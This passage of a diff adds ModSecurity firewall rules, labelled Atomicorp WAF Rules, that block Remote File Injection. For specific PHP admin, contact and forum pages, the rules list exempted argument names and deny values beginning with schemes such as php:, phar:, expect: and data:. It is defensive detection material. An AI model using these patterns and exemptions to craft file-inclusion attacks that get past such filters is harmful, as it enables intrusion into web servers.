rer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:SitePath|!ARGS:Exlink|!ARGS:contents|!ARGS:PreviewImage|!ARGS:pagelink|!ARGS:pagefeed|!ARGS:ShopPath|!ARGS:content|!ARGS:right|!ARGS:left|!ARGS:/^myDevEditControl_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" chain
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91058
+
+SecRule REQUEST_FILENAME "/admincp/user\.php" "phase:2,id:91059,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+SecAction "phase:2,id:91060,t:none,pass,nolog,skipAfter:END_RULES_91060"
+
+SecRule ARGS|!ARGS:/css/|!ARGS:site_details|!ARGS:/homepage/|!ARGS:/^userfield/|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/admincp/user.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/css/|!ARGS:/homepage/|!ARGS:/^userfield/|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/admincp/user.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91060
+
+SecRule REQUEST_FILENAME "/admincp/template\.php" "phase:2,id:91061,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91062,t:none,pass,nolog,skipAfter:END_RULES_91062"
+
+SecRule ARGS|!ARGS:searchstring|!ARGS:template|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340482,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/admincp/template.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:searchstring|!ARGS:template|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340483,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/admincp/template.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91062
+
+SecRule REQUEST_FILENAME "/contact\.php" "phase:2,id:91063,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91064,t:none,pass,nolog,skipAfter:END_RULES_91064"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:fm_comments|!ARGS:contact_message|!ARGS:homepage|!ARGS:field4|!ARGS:Page|!ARGS:msg|!ARGS:comments|!ARGS:yourmessage|!ARGS:howhear|!ARGS:information|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:/website/|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:/link/|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:Message "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340484,phase:2,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (contact.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:fm_comments|!ARGS:contact_message|!ARGS:Page|!ARGS:msg|!ARGS:comments|!ARGS:yourmessage|!ARGS:howhear|!ARGS:information|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:/website/|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:/link/|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:Message "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340485,phase:2,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (contact.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91064
+
+SecRule REQUEST_FILENAME "/admin/conf\.php" "phase:2,id:91065,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91066,t:none,pass,nolog,skipAfter:END_RULES_91066"
+
+SecRule ARGS|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340486,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/conf.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340487,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/conf.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91066
+
+SecRule REQUEST_FILENAME "/admin/posted/edit_listing\.php" "phase:2,id:91067,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91068,t:none,pass,nolog,skipAfter:END_RULES_91068"
+
+SecRule ARGS|!ARGS:my_description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340488,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:my_description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340489,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91068
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:91069,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91070,t:none,pass,nolog,skipAfter:END_RULES_91070"
+
+SecRule ARGS|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340490,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/private.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_